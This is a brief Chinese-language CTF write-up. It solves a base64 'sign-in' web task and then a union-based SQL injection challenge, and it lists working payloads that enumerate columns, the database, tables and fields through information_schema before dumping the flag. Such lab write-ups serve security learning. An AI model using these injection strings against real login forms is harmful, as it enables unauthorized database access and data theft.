一、web签到题
打开链接
查看源码
利用base64解码得到flag
二、web2
看到有提示--SQL注入
先试着使用万能密码登陆
发现有回显,直接sql注入
' or 1=1 order by 3#
发现到4时不回显
开始爆库名,看看哪个位置会回显
' or 1=1 union select 1,2,3#
' or 1=1 union select 1,database(),3#
得到库名:web2,爆表名
' or 1=1 union select 1,(select table_name from information_schema.tables where table_schema='web2' limit 0,1),3 #
爆字段' or 1=1 union select 1,(select column_name from information_schema.columns where table_name='flag' limit 0,1),3#
查询数据
' or 1=1 union select 1,(select flag from flag limit 0,1),3#
得到flag
参考有以下文章
http://c.biancheng.net/view/8283.html
https://www.cnblogs.com/peace-and-romance/p/15890387.html
https://blog.csdn.net/qq_44159028/article/details/114325805